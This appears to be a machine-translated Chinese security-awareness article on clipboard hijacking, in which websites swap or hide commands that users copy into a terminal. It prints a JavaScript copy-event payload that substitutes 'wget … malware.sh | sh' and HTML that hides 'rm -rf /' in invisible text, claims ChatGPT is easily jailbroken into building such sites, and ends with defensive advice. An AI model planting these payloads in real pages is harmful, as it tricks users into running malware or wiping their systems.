从电脑到手机,复制粘贴无处不在。 它使您的生活更轻松并节省您的时间,因为您不必输入长命令或多余的文本。 但是,如果您不够小心,只需将命令复制并粘贴到计算机终端即可被黑客攻击。
了解复制和粘贴如何让您遭受黑客攻击,以及您应该采取哪些措施来防止这种情况发生。
为什么不应该复制和粘贴命令
无论您是使用命令行的新手还是经验丰富的老手,您都可能会想从网络上复制和粘贴命令以节省时间并完成真正的工作。 但是,您应该意识到,只要您将命令直接复制并粘贴到终端中,恶意网站实际上会武器化代码框以注入恶意代码。
这些恶意行为者使用各种前端技巧将恶意命令隐藏在看似无害的代码后面。
像这样的命令 sudo apt-get 更新 && apt-get 升级 通常应该更新存储库并更新其中的软件包 Linux 系统。 但是,如果您不知道此命令并将其直接复制并粘贴到终端中,您可能会在不知不觉中以 root 权限运行恶意软件代码 sudo 字首。
在最坏的情况下,这可能会导致您的系统完全被接管,甚至遭受勒索软件攻击。 但威胁者是如何做到的呢? 恶意命令如何隐藏在无害代码后面?
恶意代码利用的工作原理
此漏洞可以使用巧妙设计的 JavaScript 甚至纯 HTML 来运行。 JavaScript 有一个机制叫做 事件监听器。 事件是发生在 Browser 可以发生,例如例如,单击按钮、提交表单、移动鼠标、按下按键或调整窗口大小。
这 事件监听器顾名思义,它允许您的 Web 应用程序响应用户操作触发的特定事件。 恶意网站通过捕获用户复制文本的事件并用恶意代码替换无害的文本来利用这种合法且有用的机制。
以下是用于构建演示映像的主要漏洞利用代码:
<script>
document.addEventListener('copy', function(event) {
event.preventDefault();
const copiedText = "wget https://localhost:8000/malware.sh | sh";
event.clipboardData.setData('text/plain', copiedText);
});
</script> 这是另一个不需要 JavaScript 并使用普通 HTML 的演示:
<p>
sudo apt-get install google-chrome-stable
<span style="color:white;font-size:0pt;">rm -rf /</span>
</p> 这会创建一个不可见的白色文本,有效隐藏恶意的“rm -rf /”命令
-Tag 创建换行符,因此某些终端在粘贴后立即运行代码。 您可能认为执行此攻击需要强大的编程和 Web 开发技能,但实际上它非常简单。
即使攻击者不了解 JavaScript 或 Web 开发知识,他们也可以轻松使用它来创建恶意软件 ChatGPT。 只要有正确的提示,越狱就很容易 ChatGPT 并利用此技巧欺骗它创建恶意网站。
如何保护自己
没有具体的方法来防止恶意代码攻击。 当然,您可以禁止可疑网站使用 JavaScript,但就其本质而言,它们可能不允许您在未启用 JavaScript 的情况下进行浏览。
此外,级联样式表(CSS)方法对恶意命令没有任何具体的保护,因为它仍然是有效的 CSS 代码(即它没有任何问题,但意图仍然是恶意的)。 保护自己的最佳方法是实行基本的互联网卫生并留意自己。
不要访问不熟悉的链接,并确保始终将从网络复制的命令粘贴到文本编辑器中,然后再粘贴到终端中。 坚持使用合法且信誉良好的代码资源,以确保您的命令行中不包含恶意代码。
此外,某些终端(例如 xfce4 终端)具有复制和粘贴保护功能。 将命令粘贴到终端后,将会出现一个弹出窗口,准确告诉您正在运行的内容。 检查您的终端是否有类似的机制并激活它。
执行恶意代码极其危险
即使您安装了防病毒程序,某些形式的恶意代码执行也可以穿透您设备的保护屏障。 因此,请务必小心您在线复制的代码,并尽可能使用保护措施来保护自己。
